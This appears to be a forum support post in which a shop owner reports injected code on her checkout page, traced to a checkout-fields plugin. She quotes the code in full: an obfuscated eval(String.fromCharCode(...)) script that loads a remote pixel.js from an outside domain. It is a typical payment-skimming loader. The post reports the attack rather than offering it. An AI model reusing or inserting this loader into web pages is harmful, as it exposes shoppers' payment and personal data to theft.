Malicious code?

Hi there,

I recently noticed on my checkout page there was some random code being outputted.

The first was a hidden field label “SRC Optional” and the second was appended to the Order Notes Label and was the following:

Order Notes
<script>eval(String.fromCharCode(118,97,114,32,115,99,114,105,112,116,95,116,97,103,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,10,115,99,114,105,112,116,95,116,97,103,46,115,101,116,65,116,116,114,105,98,117,116,101,40,39,115,114,99,39,44,39,104,116,116,112,115,58,47,47,117,109,98,114,105,97,119,97,108,107,105,110,103,46,99,111,109,47,99,111,117,110,116,101,114,47,112,105,120,101,108,46,106,115,39,41,59,10,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,115,99,114,105,112,116,95,116,97,103,41,59))</script>

I eventually found out it was coming from the Flexible Checkout Fields plugin and deleted the fields in question.

Is this a known issue?

Thanks,

Georgia